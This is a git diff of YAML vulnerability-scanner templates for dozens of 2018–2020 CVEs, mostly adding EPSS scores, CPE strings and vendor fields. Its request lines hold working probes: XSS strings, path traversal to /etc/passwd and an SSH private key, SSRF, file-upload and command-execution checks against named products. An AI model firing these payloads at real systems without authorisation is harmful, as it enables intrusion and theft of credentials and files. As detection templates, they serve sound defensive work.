a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 74bb9411c9..e062649078 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -13,9 +13,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-18570 cwe-id: CWE-79 - tags: xss,cve,cve2018,planon + epss-score: 0.00098 + cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: planonsoftware + product: planon + tags: xss,cve,cve2018,planon http: - method: GET @@ -24,16 +28,16 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index ce6da1839e..63da2f3809 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -15,10 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-18608 cwe-id: CWE-79 + epss-score: 0.00177 + cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"DedeCms" verified: true + vendor: dedecms + product: dedecms tags: dedecms,xss,cve,cve2018 http: diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index 39dce74401..705ad23980 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -14,26 +14,31 @@ info: cvss-score: 6.1 cve-id: CVE-2018-18775 cwe-id: CWE-79 - tags: cve2018,microstrategy,xss,edb,packetstorm,cve + epss-score: 0.00235 + cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: microstrategy + product: microstrategy_web + tags: cve2018,microstrategy,xss,edb,packetstorm,cve,intrusive http: - method: GET path: - - '{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C' + - "{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C" + matchers-condition: and matchers: + - type: word + part: body + words: + - '">' + + - type: word + part: header + words: + - text/html + - type: status status: - 200 - - - type: word - words: - - '">' - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index b2d3a71d76..ff0ed1585f 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -15,9 +15,13 @@ info: cvss-score: 4.3 cve-id: CVE-2018-18777 cwe-id: CWE-22 - tags: traversal,edb,packetstorm,cve,cve2018,microstrategy,lfi + epss-score: 0.00238 + cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: microstrategy + product: microstrategy_web + tags: traversal,edb,packetstorm,cve,cve2018,microstrategy,lfi http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index af34e6fabd..4ef63598c2 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -14,9 +14,13 @@ info: cvss-score: 6.5 cve-id: CVE-2018-18778 cwe-id: CWE-200 - tags: cve,cve2018,lfi,mini_httpd + epss-score: 0.95125 + cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: acme + product: mini-httpd + tags: cve,cve2018,lfi,mini_httpd http: - raw: @@ -25,12 +29,13 @@ http: Host: unsafe: true + matchers-condition: and matchers: - - type: status - status: - - 200 - - type: regex regex: - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index f2b0c25463..3e96ad2338 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -16,9 +16,13 @@ info: cvss-score: 9.8 cve-id: CVE-2018-18925 cwe-id: CWE-384 - tags: gogs,lfi,rce,vulhub,cve,cve2018 + epss-score: 0.12213 + cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: gogs + product: gogs + tags: gogs,lfi,rce,vulhub,cve,cve2018 http: - raw: @@ -26,7 +30,6 @@ http: GET / HTTP/1.1 Host: {{Hostname}} Cookie: lang=en-US; i_like_gogits=../../../../etc/passwd; - - | GET / HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index c58f78f2d2..c6d9204ebd 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -15,9 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19136 cwe-id: CWE-79 + epss-score: 0.00351 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: max-request: 2 verified: true + vendor: domainmod + product: domainmod tags: edb,cve,cve2018,domainmod,xss,authenticated http: @@ -28,12 +32,12 @@ http: Content-Type: application/x-www-form-urlencoded new_username={{username}}&new_password={{password}} - - | GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index e496c6dd19..956c1f0a92 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -14,9 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19137 cwe-id: CWE-79 + epss-score: 0.0008 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: max-request: 2 verified: true + vendor: domainmod + product: domainmod tags: cve,cve2018,domainmod,xss,authenticated http: @@ -27,12 +31,12 @@ http: Content-Type: application/x-www-form-urlencoded new_username={{username}}&new_password={{password}} - - | GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 8a080ead9a..1c96a75b15 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -11,14 +11,20 @@ info: - https://wordpress.org/plugins/ninja-forms/ - https://www.exploit-db.com/exploits/45880 - https://nvd.nist.gov/vuln/detail/CVE-2018-19287 + - https://plugins.trac.wordpress.org/changeset/1974335/ninja-forms/trunk/includes/Admin/Menus/Submissions.php classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-19287 cwe-id: CWE-79 + epss-score: 0.82305 + cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 verified: true + framework: wordpress + vendor: ninjaforma + product: ninja_forms tags: wp-plugin,wp,xss,authenticated,wpscan,edb,cve,cve2018,ninja-forms,wordpress http: @@ -29,13 +35,13 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date="> ]> @@ -36,9 +37,11 @@ http: &ent; + headers: + Content-Type: "text/xml" + matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index bc21d656ef..ab5e3450bb 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -16,11 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-12054 cwe-id: CWE-79 - cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:*:*:* epss-score: 0.00129 - tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020 + cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: catchplugins + product: catch_breadcrumb + tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020 http: - method: GET @@ -30,10 +33,10 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - "catch-breadcrumb" - part: body condition: and - type: word diff --git a/http/cves/2020/CVE-2020-12116.yaml b/http/cves/2020/CVE-2020-12116.yaml index 9709ffb49d..31381df569 100644 --- a/http/cves/2020/CVE-2020-12116.yaml +++ b/http/cves/2020/CVE-2020-12116.yaml @@ -9,16 +9,19 @@ info: - https://github.com/BeetleChunks/CVE-2020-12116 - https://nvd.nist.gov/vuln/detail/CVE-2020-12116 - https://www.manageengine.com/network-monitoring/help/read-me-complete.html + - https://www.manageengine.com/network-monitoring/help/read-me-complete.html#125125 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-12116 cwe-id: CWE-22 + epss-score: 0.97344 cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:* - epss-score: 0.97327 - tags: cve,cve2020,zoho,lfi,manageengine metadata: max-request: 2 + vendor: zohocorp + product: manageengine_opmanager + tags: cve,cve2020,zoho,lfi,manageengine http: - raw: @@ -27,7 +30,6 @@ http: Host: {{Hostname}} Accept: */* Connection: close - - | GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1 Host: {{Hostname}} @@ -36,14 +38,6 @@ http: Connection: close Referer: http://{{Hostname}} - extractors: - - type: regex - name: endpoint - part: body - internal: true - regex: - - "(?m)/cachestart/.*/jquery/" - req-condition: true matchers: - type: dsl @@ -51,3 +45,11 @@ http: - 'contains(body_2, "BEGIN RSA PRIVATE KEY")' - 'status_code_2 == 200' condition: and + + extractors: + - type: regex + name: endpoint + regex: + - "(?m)/cachestart/.*/jquery/" + internal: true + part: body diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index 64b6dba466..1cb30db2de 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -15,11 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12127 cwe-id: CWE-306 - epss-score: 0.0509 + epss-score: 0.03579 + cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"Wavlink" verified: true + vendor: wavlink + product: wn530h4_firmware tags: cve,cve2020,wavlink,exposure http: diff --git a/http/cves/2020/CVE-2020-12447.yaml b/http/cves/2020/CVE-2020-12447.yaml index ef059ff2d5..040710c4f2 100644 --- a/http/cves/2020/CVE-2020-12447.yaml +++ b/http/cves/2020/CVE-2020-12447.yaml @@ -15,9 +15,12 @@ info: cve-id: CVE-2020-12447 cwe-id: CWE-22 epss-score: 0.01261 - tags: cve,cve2020,onkyo,lfi,traversal + cpe: cpe:2.3:o:onkyo:tx-nr585_firmware:1000-0000-000-0008-0000:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: onkyo + product: tx-nr585_firmware + tags: cve,cve2020,onkyo,lfi,traversal http: - method: GET @@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml index 9cfc35491a..ffe9abc9d7 100644 --- a/http/cves/2020/CVE-2020-12478.yaml +++ b/http/cves/2020/CVE-2020-12478.yaml @@ -14,12 +14,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12478 cwe-id: CWE-306 - cpe: cpe:2.3:a:teampass:teampass:*:*:*:*:*:*:*:* - epss-score: 0.00893 + epss-score: 0.00761 + cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"teampass" verified: true + vendor: teampass + product: teampass tags: cve,cve2020,teampass,exposure,unauth http: diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index 243e131a92..456e90fcb7 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -10,16 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-12720 - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1 - http://packetstormsecurity.com/files/157716/vBulletin-5.6.1-SQL-Injection.html + - http://packetstormsecurity.com/files/157904/vBulletin-5.6.1-SQL-Injection.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-12720 - cwe-id: CWE-89,CWE-306 + cwe-id: CWE-306 + epss-score: 0.83523 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* - epss-score: 0.84671 - tags: cve2020,vbulletin,sqli,packetstorm,cve metadata: max-request: 1 + vendor: vbulletin + product: vbulletin + tags: cve2020,vbulletin,sqli,packetstorm,cve http: - raw: diff --git a/http/cves/2020/CVE-2020-12800.yaml b/http/cves/2020/CVE-2020-12800.yaml index 39d347b321..6643002c52 100644 --- a/http/cves/2020/CVE-2020-12800.yaml +++ b/http/cves/2020/CVE-2020-12800.yaml @@ -16,11 +16,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-12800 cwe-id: CWE-434 - cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:*:*:* - epss-score: 0.97428 - tags: wordpress,wp-plugin,fileupload,wp,rce,packetstorm,cve,cve2020,intrusive + epss-score: 0.97425 + cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 + framework: wordpress + vendor: codedropz + product: drag_and_drop_multiple_file_upload_-_contact_form_7 + tags: wordpress,wp-plugin,fileupload,wp,rce,packetstorm,cve,cve2020,intrusive http: - raw: @@ -52,12 +55,12 @@ http: CVE-2020-12800-{{randstr}} -----------------------------350278735926454076983690555601-- - - | GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} req-condition: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml index 80f3d97523..250edae1a3 100644 --- a/http/cves/2020/CVE-2020-13117.yaml +++ b/http/cves/2020/CVE-2020-13117.yaml @@ -13,11 +13,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13117 cwe-id: CWE-77 - epss-score: 0.06609 + epss-score: 0.0785 + cpe: cpe:2.3:o:wavlink:wn575a4_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 verified: true shodan-query: http.title:"Wi-Fi APP Login" + vendor: wavlink + product: wn575a4_firmware tags: cve,cve2020,wavlink,rce,oast,router http: diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index 61fc5b4722..261b04a3b9 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -13,11 +13,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-13121 cwe-id: CWE-601 - cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* epss-score: 0.00235 - tags: cve,cve2020,redirect,submitty,oos + cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rcos + product: submitty + tags: cve,cve2020,redirect,submitty,oos http: - raw: diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index d5dd21ec14..c34de78a73 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml @@ -14,11 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-13158 cwe-id: CWE-22 - cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:*:*:*:* - epss-score: 0.96915 - tags: cve,cve2020,artica,lfi + epss-score: 0.96888 + cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:community:*:*:* metadata: max-request: 1 + vendor: articatech + product: artica_proxy + tags: cve,cve2020,artica,lfi http: - method: GET diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index 8c6a725cd2..e809437a96 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -15,11 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13167 cwe-id: CWE-78 + epss-score: 0.97384 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* - epss-score: 0.97387 metadata: max-request: 2 hex-payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out + vendor: netsweeper + product: netsweeper tags: cve,cve2020,netsweeper,rce,python,webadmin http: diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index 6298aa0de5..45e88efa3c 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-13258 cwe-id: CWE-79 - cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:* epss-score: 0.00464 - tags: cve,cve2020,contentful,xss + cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: contentful + product: python_example + tags: cve,cve2020,contentful,xss http: - raw: diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index 6be200889d..ffe2cb9506 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -11,21 +11,24 @@ info: - https://github.com/grafana/grafana/commit/ba953be95f0302c2ea80d23f1e5f2c1847365192 - http://www.openwall.com/lists/oss-security/2020/06/03/4 - https://nvd.nist.gov/vuln/detail/CVE-2020-13379 + - http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00060.html remediation: Upgrade to 6.3.4 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H cvss-score: 8.2 cve-id: CVE-2020-13379 cwe-id: CWE-918 - epss-score: 0.24779 + epss-score: 0.16322 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Grafana" verified: true + vendor: grafana + product: grafana tags: cve,cve2020,grafana,ssrf http: - - method: GET path: - "{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1" diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index 473bc948e1..32f0657567 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -15,12 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-13405 cwe-id: CWE-306 + epss-score: 0.00667 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* - epss-score: 0.00591 metadata: max-request: 3 shodan-query: http.html:"microweber" verified: true + vendor: microweber + product: microweber tags: cve,cve2020,microweber,unauth,disclosure http: @@ -38,7 +40,6 @@ http: - "users/controller" - "modules/users/controller" - "/modules/users/controller" - matchers: - type: dsl dsl: diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index f2b429f804..54ba3e4f7b 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-13483 cwe-id: CWE-79 - cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* epss-score: 0.00113 - tags: cve,cve2020,xss,bitrix + cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: bitrix24 + product: bitrix24 + tags: cve,cve2020,xss,bitrix http: - method: GET @@ -27,9 +29,9 @@ http: - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E' stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/cves/2020/CVE-2020-13700.yaml b/http/cves/2020/CVE-2020-13700.yaml index 9e9c3d4531..d02cf5687c 100644 --- a/http/cves/2020/CVE-2020-13700.yaml +++ b/http/cves/2020/CVE-2020-13700.yaml @@ -16,11 +16,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-13700 cwe-id: CWE-639 - cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:*:*:* - epss-score: 0.01462 - tags: cve,cve2020,wordpress,plugin + epss-score: 0.01364 + cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: acf_to_rest_api_project + product: acf_to_rest_api + tags: cve,cve2020,wordpress,plugin http: - method: GET @@ -29,16 +32,15 @@ http: matchers-condition: and matchers: - - type: word + part: header words: - 'Content-Type: application/json' - part: header - type: word + part: body words: - 'acf-to-rest-api\/class-acf-to-rest-api.php' - part: body condition: and - type: status diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index 4a0d702f50..081d0f3d3b 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -11,17 +11,20 @@ info: - https://gtacknowledge.extremenetworks.com/articles/Solution/000051136 - https://gtacknowledge.extremenetworks.com - https://nvd.nist.gov/vuln/detail/CVE-2020-13820 + - https://documentation.extremenetworks.com/release_notes/netsight/XMC_8.5.0_Release_Notes.pdf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-13820 cwe-id: CWE-79 - cpe: cpe:2.3:a:extremenetworks:extreme_management_center:*:*:*:*:*:*:*:* - epss-score: 0.00222 + epss-score: 0.00237 + cpe: cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Extreme Management Center" verified: true + vendor: extremenetworks + product: extreme_management_center tags: cve,cve2020,xss,extremenetworks http: diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index 5aa85295e9..136990219f 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -17,12 +17,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-13927 + cwe-id: CWE-1188 + epss-score: 0.94321 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* - epss-score: 0.95492 metadata: max-request: 1 verified: true shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" + vendor: apache + product: airflow tags: packetstorm,cve,cve2020,apache,airflow,unauth,auth-bypass,kev http: diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index e47df145fa..6eeb92c490 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -14,33 +14,36 @@ info: cvss-score: 5.3 cve-id: CVE-2020-13937 cwe-id: CWE-922 - cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* - epss-score: 0.97436 - tags: cve,cve2020,apache + epss-score: 0.97402 + cpe: cpe:2.3:a:apache:kylin:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: kylin + tags: cve,cve2020,apache http: - method: GET path: - "{{BaseURL}}/kylin/api/admin/config" + headers: - Content-Type: application/json + Content-Type: "application/json" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word + part: header words: - "application/json" - part: header - type: word + part: body words: - config - kylin.metadata.url condition: and - part: body + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-13942.yaml b/http/cves/2020/CVE-2020-13942.yaml index 29bc3cf904..bdb3153322 100644 --- a/http/cves/2020/CVE-2020-13942.yaml +++ b/http/cves/2020/CVE-2020-13942.yaml @@ -20,19 +20,20 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-13942 - cwe-id: CWE-74 + cwe-id: CWE-74,CWE-20 + epss-score: 0.97533 cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:* - epss-score: 0.9752 - tags: cve,cve2020,apache,rce metadata: max-request: 1 + vendor: apache + product: unomi + tags: cve,cve2020,apache,rce http: - method: POST path: - "{{BaseURL}}/context.json" - headers: - Content-Type: application/json + body: | { "filters": [ @@ -53,15 +54,11 @@ http: "sessionId": "nuclei" } + headers: + Content-Type: "application/json" + matchers-condition: and matchers: - - type: regex - part: body - regex: - - "(profile|session)(Id|Properties|Segments)" - - "[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}" - condition: and - - type: word part: header words: @@ -69,6 +66,13 @@ http: - "context-profile-id" condition: and + - type: regex + part: body + regex: + - "(profile|session)(Id|Properties|Segments)" + - "[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}" + condition: and + - type: status status: - 200 diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 3ab846f850..c9eb69b7e8 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -15,11 +15,13 @@ info: cvss-score: 6.5 cve-id: CVE-2020-13945 cwe-id: CWE-522 - cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* epss-score: 0.00598 - tags: intrusive,vulhub,packetstorm,cve,cve2020,apache,apisix + cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: apache + product: apisix + tags: intrusive,vulhub,packetstorm,cve,cve2020,apache,apisix http: - raw: @@ -39,7 +41,6 @@ http: } } } - - | GET /{{randstr}}?cmd=id HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml index 25f380a2d5..f4bdee3db1 100644 --- a/http/cves/2020/CVE-2020-14092.yaml +++ b/http/cves/2020/CVE-2020-14092.yaml @@ -9,16 +9,21 @@ info: - https://wpscan.com/vulnerability/10287 - https://wordpress.dwbooster.com/forms/payment-form-for-paypal-pro - https://nvd.nist.gov/vuln/detail/CVE-2020-14092 + - https://wordpress.org/plugins/payment-form-for-paypal-pro/#developers + - https://wpvulndb.com/vulnerabilities/10287 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14092 cwe-id: CWE-89 - cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:*:*:* - epss-score: 0.8613 - tags: wp-plugin,sqli,paypal,wpscan,cve,cve2020,wordpress + epss-score: 0.76739 + cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: ithemes + product: paypal_pro + tags: wp-plugin,sqli,paypal,wpscan,cve,cve2020,wordpress http: - method: GET @@ -28,17 +33,18 @@ http: matchers-condition: and matchers: - type: word + part: header words: - "text/html" - part: header + - type: word + part: body words: - '"user_login"' - '"user_email"' - '"user_pass"' - '"user_activation_key"' condition: and - part: body - type: status status: diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index a5091c102e..5c73904b6c 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -11,55 +11,52 @@ info: - 